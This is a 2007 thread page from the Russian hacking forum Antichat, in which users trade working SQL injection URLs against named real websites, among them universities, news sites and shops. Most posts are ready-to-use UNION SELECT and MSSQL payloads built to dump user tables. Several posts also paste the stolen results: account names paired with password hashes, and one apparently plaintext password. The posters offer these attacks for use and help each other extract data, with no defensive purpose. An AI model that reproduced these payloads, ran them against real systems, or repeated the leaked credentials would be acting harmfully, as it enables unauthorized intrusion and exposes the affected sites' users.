ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #471  
Старый 12.02.2007, 03:56
Аватар для +StArT+
+StArT+
Познающий
Регистрация: 10.02.2007
Сообщений: 38
Провел на форуме:
1223241

Репутация: 183
Отправить сообщение для +StArT+ с помощью ICQ
По умолчанию

http://muzspider.ru/download.php?id=-1+union+select+user(),2/*

Последний раз редактировалось +StArT+; 12.02.2007 в 13:42..
 
Ответить с цитированием

  #472  
Старый 12.02.2007, 14:50
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
http://www.cellosoft.com/software/view.php?id=-45%20union%20select%201,2,3,4,5,6,7,8,9,0,11,12,13 ,14/*
Цитата:
http://www.nanocenter.umd.edu/equipment_detail.php?equipment_id=65%20UNION%20SEL ECT%200,1,2,3,4,5,email,7,8,9,10,11,12,13,14,15,16 ,17,18,username,password,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38%20from%20user/*
Вот еще:

Цитата:
http://www.dwt-haarlem.nl/index.php?page=artikel&nr=-145%20union%20select%201,concat(user,char(58),pass word),3,4,5%20from%20user/*
Цитата:
http://www.dwt-haarlem.nl/index.php?page=artikel&nr=-145%20union%20select%201,concat(user_email,char(58 ),user_password),3,4,5%20from%20phpbb_users/*
И еще одна (MsSql)

Цитата:
http://www.dentistry.ubc.ca/directory/faculty/detail.asp?user_id=1+or+1=(SELECT+TOP+1+cast(user_ name+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+% 20nvarchar)+from+gpr_user_tbl)--
И еще парочку (пруха у меня сегодня )

Цитата:
http://www.top-nachrichten24.de/content/eansicht.php?nid=-670%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,password,login,name,email,22,23,2 4,25,26,27,28,29,30,31%20from%20user/*
Цитата:
http://www.abc-imports.com/public/list.php?user_id=-6%20UNION%20SELECT%200,1,2,3,4,5,database(),7,user (),9,10/*
Цитата:
http://www.mikelkelleystudio.com/public/view_exhibit.php?user_id=-6%20UNION%20SELECT%200,1,2,3,4,5,user(),7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45,46,47,48,49,50,51,52,53,54,55,56,57,58,databas e(),60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,7 5,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90/*
Цитата:
http://www.ctbauer.com/public/view_exhibit.php?user_id=6%20UNION%20SELECT%200,1, 2,3,4,5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,%2028,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44%20,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,database(),60,61,62,63,64, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81 ,82,83,84,85,86,87,88,89,90/*
Цитата:
http://ogloszenia.jaslo4u.pl/index.php?catid=-7%20union%20select%20database(),2/*

Последний раз редактировалось kamaz; 12.02.2007 в 16:37..
 
Ответить с цитированием

  #473  
Старый 12.02.2007, 16:34
Аватар для n0ne
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Код:
http://www.philos.msu.ru/library.php?sid=-2+union+select+1,2,concat(login,0x3a,passw),4,5,6,7,8,9,10,11+from+users/*
admin:a98948bf0421ef30e4e19c0b4844600d

Код:
http://www.stumptuous.com/cms/displaysection.php?sid=-4+union+select+concat(username,0x3a,password),2+from+author/*
krust:mongolkcndy

Код:
http://www.vectorlinux.com/topics.php?op=viewtopic&topic=-2+union+select+1,2,3,concat(name,0x3a,pass)+from+users/*
Tony Brijeski:dd0ced770c9b3a5209a1c48dba1c6d86 - он там главный похоже)) хотя хз)))

Код:
http://www.singletrackworld.com/article.php?sid=-1+union+select+concat(name,0x3a,pass)+from+users/*
admin:a1aa1235bfd3e72b88e8a9a5e9e2aafd (логин вродебы такой, вывести его не смог )

Код:
http://www.bityard.com/article.php?sid=-900+union+select+1,2,pass,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+users/*
hz:erUp/TO/6KzsE (логин найти не смог, что за крипт пасса тож не пойму, хотя мож это и открытый пасс )

Код:
http://www.peruinforma.com/imwebsite/article.php?sid=-28079+union+select+1,2,concat(name,0x3a,pwd),4,5,6,7,8+from+authors/*
Admin:383b9cc05b994282c5b5e80202542ed9

Код:
http://www.emsch.ru/main.php?tid=-59+union+select+1,concat(username,0x3a,user_password)+from+users/*
Admin:7c1b969e5afc49ea256879b8131cac3d

Код:
http://www.dubinushka.ru/m_files.php?ms_id=-54+union+select+1,concat(login,0x3a,pass)+from+users/*
Kirilll:ba25703a7de3eaf0e093ce9da55e9abf
Blade:c9ea45596a6ab3d5ab1f846d2dd0d9e9
 
Ответить с цитированием

  #474  
Старый 12.02.2007, 17:31
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Код:
http://shots.osdir.com/slideshows/slideshow.php?slide=9&release=-99+union+select+AES_DECRYPT(aes_encrypt(user(),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12,13/*
=\
 
Ответить с цитированием

ufs.com.ua
  #475  
Старый 12.02.2007, 22:07
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию ufs.com.ua

http://www.ufs.com.ua/stories/showlaw.php?id=-427+union+select+concat(user,0x3a,password),2,3+fr om+mysql.user+limit+1,1/*
Украинский Финансовый Сервер ох уж и не везет украинцам
 
Ответить с цитированием

  #476  
Старый 12.02.2007, 22:21
Аватар для Termin@L
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

http://www.trb.org/news/blurb_detail.asp?id=2326
я лол помогите кто-нить отсюда вытащить через подзапросы
http://www.intersol.co.il/ispr/index.php?page=2'

Последний раз редактировалось Termin@L; 12.02.2007 в 22:45..
 
Ответить с цитированием

  #477  
Старый 12.02.2007, 22:40
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

2Termin@L
Там MsSql. http://www.trb.org/calendar/event.asp?id=1'
Цитата:
Значит мы нашли вывод ошибки, но это еще не означает что получится изменить запрос к бд
Вроде бы тут ничего нельзя сделать
 
Ответить с цитированием

  #478  
Старый 12.02.2007, 22:45
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Код:
http://planetelderscrolls.gamespy.com/fms/Image.php?id=-1+union+select+table_name,2,3,4+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*
=\
 
Ответить с цитированием

  #479  
Старый 12.02.2007, 23:30
Аватар для Goudini
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию

}{0TT@БЬ)Ч
юзай поиск по форуму, про эту скулю я писал раньше
http://forum.antichat.ru/showpost.php?p=285086&postcount=482

muzon.com

Код:
http://muzon.com/view_post.php?post_id=-1+union+select+1,concat(name,char(58),pass,char(58),mail,char(58),icq),3,4,5,6,7,8,9,10,11+from+users/*
дофига юзеров, асек, мыл
 
Ответить с цитированием

  #480  
Старый 12.02.2007, 23:36
Аватар для *D1VER
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

http://www.cisa.ru/news_full.php?nid=-26+union+select+session_user()/*&
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ